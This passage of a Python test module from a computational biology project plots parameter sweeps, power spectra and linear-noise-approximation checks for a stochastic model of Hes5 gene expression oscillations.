for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'extended_degradation_sweep.npy'))
# 'extended_relative_sweeps_' + parameter_name + '.npy'))
increase_indices = np.where(my_parameter_sweep_results[:,9,3] < 300)
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
# my_sweep_parameters = my_posterior_samples[increase_indices]
x_coord = -0.4
y_coord = 1.1
my_figure = plt.figure( figsize = (4.5, 1.5) )
this_axis = my_figure.add_subplot(121)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,2], color ='teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('COV')
plt.gca().set_rasterization_zorder(1)
plt.axvline( np.log(2)/90, color = 'darkblue' )
plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
plt.xlim(0,np.log(2)/15.)
# this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.2)
plt.title('stochastic')
# this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(122)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,7], color = 'teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
# this_axis.set_ylabel('Coherence')
plt.title('deterministic')
plt.gca().set_rasterization_zorder(1)
plt.axvline( np.log(2)/90, color = 'darkblue' )
plt.gca().text(x_coord, y_coord, 'B', transform=plt.gca().transAxes)
plt.xlim(0,np.log(2)/15.)
# this_axis.set_ylim(0,0.2)
# this_axis.set_ylim(0,0.5)
# this_axis.set_ylim(0,0.25)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','amplitude_model_prediction_' + parameter_name + '.pdf'), dpi = 400)
def xest_plot_model_prediction(self):
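"""Plot period and coherence responses (columns 3 and 4 of each
sweep table) to relative changes in protein degradation."""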
sns.set_style({"xtick.direction": "in","ytick.direction": "in"})
parameter_names = ['protein_degradation_rate']
x_labels = dict()
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'narrowed_relative_sweeps_' + parameter_name + '.npy'))
increase_indices = np.where(my_parameter_sweep_results[:,9,3] < 300)
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
# my_sweep_parameters = my_posterior_samples[increase_indices]
x_coord = -0.4
y_coord = 1.1
my_figure = plt.figure( figsize = (4.5, 1.5) )
this_axis = my_figure.add_subplot(121)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
plt.gca().set_rasterization_zorder(1)
plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(122)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
plt.gca().set_rasterization_zorder(1)
plt.gca().text(x_coord, y_coord, 'B', transform=plt.gca().transAxes)
this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.5)
# this_axis.set_ylim(0,0.25)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','model_prediction_' + parameter_name + '.pdf'), dpi = 400)
def xest_plot_bifurcation_implementation(self):
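"""Three-panel illustration of how coherence responds to protein
degradation, relative Hill coefficient, and relative time delay."""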
sns.set_style({"xtick.direction": "in","ytick.direction": "in"})
my_figure = plt.figure( figsize = (6.5, 1.5) )
my_figure.add_subplot(131)
# my_degradation_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'data',
# 'narrowed_degradation_sweep.npy'))
my_degradation_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'output',
'extended_degradation_sweep.npy'))
x_coord = -0.3
y_coord = 1.05
for results_table in my_degradation_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.axvline( np.log(2)/90, color = 'darkblue' )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Coherence')
plt.ylim(0,1)
plt.xlim(0,np.log(2)/15.)
plt.gca().text(x_coord, y_coord, 'A', transform=plt.gca().transAxes)
my_figure.add_subplot(132)
hill_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'extended_relative_sweeps_hill_coefficient.npy'))
for results_table in hill_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('rel. Hill coefficient')
plt.axvline( 1.0, color = 'darkblue' )
plt.gca().text(x_coord, y_coord, 'B', transform=plt.gca().transAxes)
plt.ylim(0,1)
plt.xlim(0.1,2)
my_figure.add_subplot(133)
delay_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'extended_relative_sweeps_time_delay.npy'))
for results_table in delay_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'teal', alpha = 0.02, zorder = 0)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().set_rasterization_zorder(1)
plt.axvline( 1.0, color = 'darkblue')
plt.xlabel('rel. Transcription delay')
plt.gca().text(x_coord, y_coord, 'C', transform=plt.gca().transAxes)
plt.ylim(0,1)
plt.xlim(0.1,2)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','extended_bifurcation_illustration.pdf'), dpi = 400)
def xest_plot_bayes_factors_for_models(self):
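"""For each parameter, compute the fraction of non-oscillating
accepted samples (coherence < 0.1 or period > 600 min) that become
oscillatory at the sweep entries labelled below as parameter
decrease and increase, and plot the normalised fractions."""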
# saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_narrowed')
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_repeated')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_massive')
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
sns.set()
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05)))
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
number_of_absolute_samples = len(accepted_indices[0])
print('number of accepted samples for the base model is')
print(number_of_absolute_samples)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'Transcription rate'
x_labels['translation_rate'] = 'Translation rate'
x_labels['repression_threshold'] = 'Repression threshold'
x_labels['time_delay'] = 'Transcription delay'
x_labels['mRNA_degradation_rate'] = 'mRNA degradation'
x_labels['protein_degradation_rate'] = 'Protein degradation'
x_labels['hill_coefficient'] = 'Hill coefficient'
decrease_ratios = dict()
increase_ratios = dict()
bardata = []
for parameter_name in parameter_names:
print('investigating ' + parameter_name)
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
# 'data',
'output',
# 'narrowed_relative_sweeps_' +
'repeated_relative_sweeps_' +
# 'extended_relative_sweeps_' +
parameter_name + '.npy'))
print('number of non-oscillating base samples is')
# number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
# my_parameter_sweep_results[:,9,4] < 0.1))[0])
number_of_absolute_samples = len(np.where(np.logical_or(accepted_model_results[:,2] > 600,
accepted_model_results[:,3] < 0.1))[0])
print(number_of_absolute_samples)
decrease_indices = np.where(np.logical_and(np.logical_or(accepted_model_results[:,3] < 0.1,
accepted_model_results[:,2] > 600),
np.logical_and(my_parameter_sweep_results[:,0,3] < 300,
my_parameter_sweep_results[:,0,4] > 0.1)))
# decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,9,3] > 600),
# np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
# my_parameter_sweep_results[:,4,4] > 0.1)))
decrease_ratios[parameter_name] = len(decrease_indices[0])/float(number_of_absolute_samples)
print('number of samples oscillating after decrease is')
number_of_decrease_samples = len(decrease_indices[0])
print(number_of_decrease_samples)
increase_indices = np.where(np.logical_and(np.logical_or(accepted_model_results[:,3] < 0.1,
accepted_model_results[:,2] > 600),
np.logical_and(my_parameter_sweep_results[:,1,3] < 300,
my_parameter_sweep_results[:,1,4] > 0.1)))
# increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,9,3] > 600),
# np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
# my_parameter_sweep_results[:,14,4] > 0.1)))
increase_ratios[parameter_name] = len(increase_indices[0])/float(number_of_absolute_samples)
print('number of samples oscillating after increase is')
number_of_increase_samples = len(increase_indices[0])
print(number_of_increase_samples)
increase_bars = [increase_ratios[parameter_name] for parameter_name
in parameter_names]
decrease_bars = [decrease_ratios[parameter_name] for parameter_name
in parameter_names]
increase_positions = np.arange(len(increase_bars))
decrease_positions = np.arange(len(decrease_bars)) + len(increase_bars)
all_positions = np.hstack((increase_positions, decrease_positions))
all_bars = np.array( increase_bars + decrease_bars)
labels_up = [x_labels[parameter_name] + ' up' for parameter_name in parameter_names]
labels_down = [x_labels[parameter_name] + ' down' for parameter_name in parameter_names]
all_labels = labels_up + labels_down
sorting_indices = np.argsort(all_bars)
sorted_labels = [all_labels[sorting_index] for
sorting_index in sorting_indices]
sorted_bars = np.sort(all_bars)
sorted_bars/= np.sum(sorted_bars)
my_figure = plt.figure( figsize = (4.5, 1.5) )
plt.bar(all_positions, sorted_bars[::-1])
sorted_labels.reverse()
# plt.xticks( all_positions + 0.4 ,
plt.xticks( all_positions,
sorted_labels,
rotation = 30,
fontsize = 5,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5, all_positions[-1] + 0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=4)
plt.ylim(0,sorted_bars[-1]*1.2)
plt.ylabel('Likelihood')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'likelihood_plot_for_paper.pdf'))
def xest_plot_power_spectra_before(self):
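"""Plot power spectra at the non-oscillating accepted parameter
points, together with their mean spectrum."""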
# saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_narrowed')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_repeated')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
sns.set()
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
number_of_absolute_samples = len(accepted_indices[0])
# where is coherence less than 0.1 or period larger than 600
new_accepted_indices = np.where(np.logical_or(accepted_model_results[:,2] > 600,
accepted_model_results[:,3] < 0.1))
these_posterior_samples = my_posterior_samples[new_accepted_indices]
# optionally downsample; currently all accepted samples are used
# fewer_samples = these_posterior_samples[:1000]
fewer_samples = these_posterior_samples
power_spectra = hes5.calculate_power_spectra_at_parameter_points(fewer_samples)
my_figure = plt.figure( figsize = (4.5, 1.5) )
for power_spectrum in power_spectra[:,1:].transpose():
plt.plot(power_spectra[:,0], power_spectrum, ls = 'solid',
color ='teal', alpha = 0.02, zorder = 0)
plt.plot(power_spectra[:,0], np.mean(power_spectra[:,1:],axis = 1), ls = 'solid',
color ='blue')
# plt.gca().locator_params(axis='y', tight = True, nbins=5)
# plt.ylim(0,sorted_bars[-1]*1.2)
plt.xlim(0.0,0.01)
plt.gca().set_rasterization_zorder(1)
plt.ylabel('Power')
plt.xlabel('Frequency [1/min]')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'power_spectra_before.pdf'), dpi = 400)
def xest_plot_power_spectra_before_and_after(self):
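# For each model parameter, compare the power spectra of poorly oscillating
# posterior samples before and after perturbing that parameter by -50% or
# +50%. In the 'after' condition the mRNA and protein degradation rates are
# appended explicitly at their experimentally measured values, ln(2)/30 and
# ln(2)/90 per minute.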
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_repeated')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_massive')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
index_to_parameter_name_lookup = {0: 'basal_transcription_rate',
1: 'translation_rate',
2: 'repression_threshold',
3: 'time_delay',
4: 'hill_coefficient',
5: 'mRNA_degradation_rate',
6: 'protein_degradation_rate'}
parameter_name_to_index_lookup = {'basal_transcription_rate':0,
'translation_rate' :1,
'repression_threshold' :2,
'time_delay' :3,
'hill_coefficient' :4,
'mRNA_degradation_rate' :5,
'protein_degradation_rate':6 }
sns.set()
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
for parameter_name in parameter_names:
print('investigating ' + parameter_name)
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
# 'data',
'output',
'repeated_relative_sweeps_' +
parameter_name + '.npy'))
print('the number of accepted base samples is')
# number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
# my_parameter_sweep_results[:,9,4] < 0.1))[0])
number_of_absolute_samples = len(np.where(np.logical_or(accepted_model_results[:,2] > 600,
accepted_model_results[:,3] < 0.1))[0])
print(number_of_absolute_samples)
decrease_indices = np.where(np.logical_and(np.logical_or(accepted_model_results[:,3] < 0.1,
accepted_model_results[:,2] > 600),
np.logical_and(my_parameter_sweep_results[:,0,3] < 300,
my_parameter_sweep_results[:,0,4] > 0.1)))
# decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,9,3] > 600),
# np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
# my_parameter_sweep_results[:,4,4] > 0.1)))
increase_indices = np.where(np.logical_and(np.logical_or(accepted_model_results[:,3] < 0.1,
accepted_model_results[:,2] > 600),
np.logical_and(my_parameter_sweep_results[:,1,3] < 300,
my_parameter_sweep_results[:,1,4] > 0.1)))
# increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,9,3] > 600),
# np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
# my_parameter_sweep_results[:,14,4] > 0.1)))
decrease_parameters_before = my_posterior_samples[decrease_indices]
increase_parameters_before = my_posterior_samples[increase_indices]
print('number of accepted decrease samples is ' + str(len(decrease_indices[0])))
print('number of accepted increase samples is ' + str(len(increase_indices[0])))
print('these are the before parameters')
print(decrease_parameters_before)
print(increase_parameters_before)
if len(decrease_parameters_before) > 100:
decrease_parameters_before = decrease_parameters_before[:100]
if len(increase_parameters_before) > 100:
increase_parameters_before = increase_parameters_before[:100]
dummy_zeros = np.zeros((decrease_parameters_before.shape[0],2))
decrease_parameters_after = np.hstack((decrease_parameters_before,dummy_zeros))
dummy_zeros = np.zeros((increase_parameters_before.shape[0],2))
increase_parameters_after = np.hstack((increase_parameters_before,dummy_zeros))
decrease_parameters_after[:,-2] = np.log(2.)/30.
increase_parameters_after[:,-2] = np.log(2.)/30.
decrease_parameters_after[:,-1] = np.log(2.)/90.
increase_parameters_after[:,-1] = np.log(2.)/90.
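# the two appended columns are the mRNA and protein degradation rates,
# ln(2)/30 and ln(2)/90 per minute, i.e. half-lives of 30 and 90 minutes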
print('these are the increase parameters after')
print(increase_parameters_after)
parameter_index = parameter_name_to_index_lookup[parameter_name]
try:
reference_decrease_parameters = decrease_parameters_after[:,parameter_index]
print('reference values for decreasing ' + parameter_name + ' are')
print(reference_decrease_parameters)
decreased_parameters = reference_decrease_parameters*0.5
decrease_parameters_after[:,parameter_index] = decreased_parameters
print('calculating power spectra before and after the decrease')
decrease_spectra_before = hes5.calculate_power_spectra_at_parameter_points(decrease_parameters_before)
decrease_spectra_after = hes5.calculate_power_spectra_at_parameter_points(decrease_parameters_after)
except Exception as e:
# fall back to dummy spectra so that the plotting code below still runs
print(repr(e))
decrease_spectra_before = np.array([[0,0],[0,0]])
decrease_spectra_after = np.array([[0,0],[0,0]])
try:
reference_increase_parameters = increase_parameters_after[:,parameter_index]
print('reference values for increasing ' + parameter_name + ' are')
print(reference_increase_parameters)
increased_parameters = reference_increase_parameters*1.5
increase_parameters_after[:,parameter_index] = increased_parameters
print('calculating power spectra before and after the increase')
increase_spectra_before = hes5.calculate_power_spectra_at_parameter_points(increase_parameters_before)
increase_spectra_after = hes5.calculate_power_spectra_at_parameter_points(increase_parameters_after)
except Exception as e:
# fall back to dummy spectra so that the plotting code below still runs
print(repr(e))
increase_spectra_before = np.array([[0,0],[0,0]])
increase_spectra_after = np.array([[0,0],[0,0]])
my_figure = plt.figure( figsize = (6, 4.5) )
my_figure.add_subplot(221)
for power_spectrum in decrease_spectra_before[:,1:].transpose():
plt.plot(decrease_spectra_before[:,0], power_spectrum, ls = 'solid',
color ='teal', alpha = 0.2, zorder = 0)
plt.plot(decrease_spectra_before[:,0],
np.mean(decrease_spectra_before[:,1:],axis = 1), ls = 'solid',
color ='blue')
plt.xlim(0.0,0.01)
plt.axvline(1/300.0)
plt.axvline(1/600.0)
# plt.gca().set_rasterization_zorder(1)
plt.ylabel('Power')
plt.title(parameter_name + ' decrease before')
plt.xlabel('Frequency [1/min]')
my_figure.add_subplot(222)
for power_spectrum in decrease_spectra_after[:,1:].transpose():
plt.plot(decrease_spectra_after[:,0], power_spectrum, ls = 'solid',
color ='teal', alpha = 0.2, zorder = 0)
plt.plot(decrease_spectra_after[:,0],
np.mean(decrease_spectra_after[:,1:],axis = 1), ls = 'solid',
color ='blue')
plt.xlim(0.0,0.01)
plt.axvline(1/300.0)
plt.axvline(1/600.0)
# plt.gca().set_rasterization_zorder(1)
plt.ylabel('Power')
plt.title(parameter_name + ' decrease after')
plt.xlabel('Frequency [1/min]')
my_figure.add_subplot(223)
for power_spectrum in increase_spectra_before[:,1:].transpose():
plt.plot(increase_spectra_before[:,0], power_spectrum, ls = 'solid',
color ='teal', alpha = 0.2, zorder = 0)
plt.plot(increase_spectra_before[:,0],
np.mean(increase_spectra_before[:,1:],axis = 1), ls = 'solid',
color ='blue')
plt.xlim(0.0,0.01)
plt.axvline(1/300.0)
plt.axvline(1/600.0)
# plt.gca().set_rasterization_zorder(1)
plt.ylabel('Power')
plt.title(parameter_name + ' increase before')
plt.xlabel('Frequency [1/min]')
my_figure.add_subplot(224)
for power_spectrum in increase_spectra_after[:,1:].transpose():
plt.plot(increase_spectra_after[:,0], power_spectrum, ls = 'solid',
color ='teal', alpha = 0.2, zorder = 0)
plt.plot(increase_spectra_after[:,0],
np.mean(increase_spectra_after[:,1:],axis = 1), ls = 'solid',
color ='blue')
plt.xlim(0.0,0.01)
plt.axvline(1/300.0)
plt.axvline(1/600.0)
plt.gca().set_rasterization_zorder(1)
plt.ylabel('Power')
plt.title(parameter_name + ' increase after')
plt.xlabel('Frequency [1/min]')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
parameter_name + '_likelihood_plot_spectra_investigation.pdf'))
def xest_plot_stochastic_amplification(self):
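# Illustrate stochastic amplification: for the first posterior sample with
# coherence > 0.3, plot three stochastic (Langevin) trajectories of Hes5
# protein against the deterministic delay-equation solution at the same
# parameter point.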
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.3))))
# model_results[:,1]>0.05)))
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
this_parameter = my_posterior_samples[0]
print('parameter is')
print(this_parameter)
number_of_trajectories = 3
hes5_mRNA_trajectories, hes5_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_trajectories,
duration = 2000,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
transcription_delay = this_parameter[3],
initial_mRNA = 3,
initial_protein = this_parameter[2],
hill_coefficient = this_parameter[4],
equilibration_time = 0)
#
deterministic_trajectory = hes5.generate_deterministic_trajectory(duration = 2000,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
transcription_delay = this_parameter[3],
initial_mRNA = 3,
initial_protein = this_parameter[2],
# repression_threshold = 31400,
# mRNA_degradation_rate = np.log(2)/30,
# protein_degradation_rate = np.log(2)/90,
# translation_rate = 29,
# basal_transcription_rate = 11,
# transcription_delay = 29,
# initial_mRNA = 3,
# initial_protein = 31400,
hill_coefficient = this_parameter[4],
for_negative_times = 'no_negative')[:-1]
mean_hes5_protein_trajectory = np.mean(hes5_protein_trajectories[:,1:], axis = 1)
mean_hes5_rna_trajectory = np.mean(hes5_mRNA_trajectories[:,1:], axis = 1)
figuresize = (4,2.5)
my_figure = plt.figure(figsize = figuresize)
plt.plot( hes5_protein_trajectories[:,0],
hes5_protein_trajectories[:,1]/10000, color = 'black',
lw = 0.5, alpha = 0.2, label = 'stochastic' )
for trajectory_index in range(2,number_of_trajectories+1):
# plt.plot( hes5_mRNA_trajectories[:,0],
# hes5_mRNA_trajectories[:,trajectory_index]*1000., color = 'black',
# lw = 0.5, alpha = 0.1 )
plt.plot( hes5_protein_trajectories[:,0],
hes5_protein_trajectories[:,trajectory_index]/10000, color = 'black',
lw = 0.5, alpha = 0.2 )
# plt.plot( hes5_mRNA_trajectories[:,0],
# mean_hes5_rna_trajectory*1000., label = 'mRNA*1000', color = 'blue',
# lw = 0.5 )
plt.plot( deterministic_trajectory[:,0], deterministic_trajectory[:,2]/10000,
lw = 0.5, label = 'deterministic' )
# plt.plot( hes5_protein_trajectories[:,0],
# mean_hes5_protein_trajectory, label = 'Protein', color = 'blue', ls = '--',
# lw = 0.5, dashes = [1,1] )
plt.xlabel('Time [min]')
plt.ylabel('Hes5 expression/1e4')
plt.xlim(0,2000)
# plt.ylim(0,10)
# plt.legend(bbox_to_anchor=(1.05, 1.1), loc = 'upper right')
plt.legend(loc = 'upper right')
plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','stochastic_amplification.pdf'))
def xest_investigate_lna_prediction_at_low_degradation(self):
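# Probe the linear noise approximation (LNA) in a low-degradation regime:
# for a weakly coherent posterior sample (coherence < 0.03), compute the
# theoretical power spectrum with both degradation rates set to 0.01/min
# and compare it against the spectrum measured from stochastic simulation
# at the same parameter point.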
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]<0.03)))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
sample = posterior_samples[0]
# an exploratory deterministic run is kept commented out below
# my_trajectory = hes5.generate_deterministic_trajectory( duration = 720,
# repression_threshold = 100,
# mRNA_degradation_rate = 0.03,
# protein_degradation_rate = 0.03,
# transcription_delay = 19,
# initial_mRNA = 3,
# initial_protein = 100)
# # integrator = 'PyDDE',
# # for_negative_times = 'no_negative' )
print('experimental values for mrna and protein degradation are')
print(np.log(2)/30)
print(np.log(2)/90)
theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point( repression_threshold = sample[2],
hill_coefficient = sample[4],
# mRNA_degradation_rate = np.log(2)/30,
# protein_degradation_rate = np.log(2)/90,
mRNA_degradation_rate = 0.01,
protein_degradation_rate = 0.01,
basal_transcription_rate = sample[0],
translation_rate = sample[1],
transcription_delay = sample[3] )
coherence, period = hes5.calculate_coherence_and_period_of_power_spectrum( theoretical_power_spectrum )
print('theoretical coherence and period are')
print(coherence)
print(period)
full_parameter_point = np.array([sample[0],
sample[1],
sample[2],
sample[3],
sample[4],
0.01,
0.01])
# np.log(2)/30,
# np.log(2)/90])
real_power_spectrum = hes5.calculate_power_spectrum_at_parameter_point( full_parameter_point )
#Second: plot the theoretical and simulated power spectra
figuresize = (4,2.75)
my_figure = plt.figure(figsize = figuresize)
# labels are needed so that the plt.legend() call below has entries
plt.plot(theoretical_power_spectrum[:,0],
theoretical_power_spectrum[:,1], label = 'LNA theory')
plt.plot(real_power_spectrum[:,0],
real_power_spectrum[:,1], label = 'simulation')
plt.xlabel('Frequency [1/min]')
plt.ylabel('Power')
plt.xlim(0,0.01)
plt.legend()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','weird_power_spectrum.pdf'))
def xest_plot_lna_std_vs_model_results(self):
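# Validate the LNA against simulation: for every posterior sample, compare
# the LNA-predicted relative standard deviation with the value obtained
# from stochastic (CLE) simulations, quantify the fraction disagreeing by
# more than 10%, and plot the marginal parameter distributions of the
# outliers; a second set of histograms isolates the cases where the CLE
# exceeds the LNA prediction.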
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
theoretical_standard_deviation = np.zeros(len(posterior_samples))
for sample_index, sample in enumerate(posterior_samples):
this_standard_deviation = hes5.calculate_approximate_standard_deviation_at_parameter_point(basal_transcription_rate = sample[0],
translation_rate = sample[1],
repression_threshold = sample[2],
transcription_delay = sample[3],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
hill_coefficient = sample[4]
)
steady_state_mrna, steady_state_protein = hes5.calculate_steady_state_of_ode(basal_transcription_rate = sample[0],
translation_rate = sample[1],
repression_threshold = sample[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
hill_coefficient = sample[4]
)
relative_standard_deviation = this_standard_deviation/steady_state_protein
theoretical_standard_deviation[ sample_index ] = relative_standard_deviation
error_ratios = theoretical_standard_deviation / posterior_results[:,1]
relative_errors = np.abs(error_ratios - 1)
number_of_poor_samples = np.sum(relative_errors>0.1)
print('ratio of poor approximations is')
print(number_of_poor_samples/float(len(posterior_samples)))
print('total number is')
print(number_of_poor_samples)
plt.figure(figsize = (4.5,2.5))
plt.scatter(theoretical_standard_deviation, posterior_results[:,1], s = 0.5)
plt.plot([0.0,0.25],1.1*np.array([0.0,0.25]), lw = 1, color = 'grey')
plt.plot([0.0,0.25],0.9*np.array([0.0,0.25]), lw = 1, color = 'grey')
plt.xlabel("LNA")
plt.ylabel("CLE")
plt.title("Relative standard deviation")
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','LNA_validation.pdf'))
# now, we need to plot where the outliers are:
outlier_mask = relative_errors > 0.1
outlier_samples = posterior_samples[outlier_mask]
outlier_results = posterior_results[outlier_mask]
print('outlier coherences are')
print(outlier_results[:,3])
outlier_samples[:,2]/=10000
print('minimal outlier coherence is')
print(np.min(outlier_results[:,3]))
print('posterior samples with coherence above 0.5')
print(np.sum(posterior_results[:,3]>0.5))
data_frame = pd.DataFrame( data = outlier_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,np.log10(60.0),20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,np.log10(60.0))
plt.ylabel("Probability", labelpad = 20)
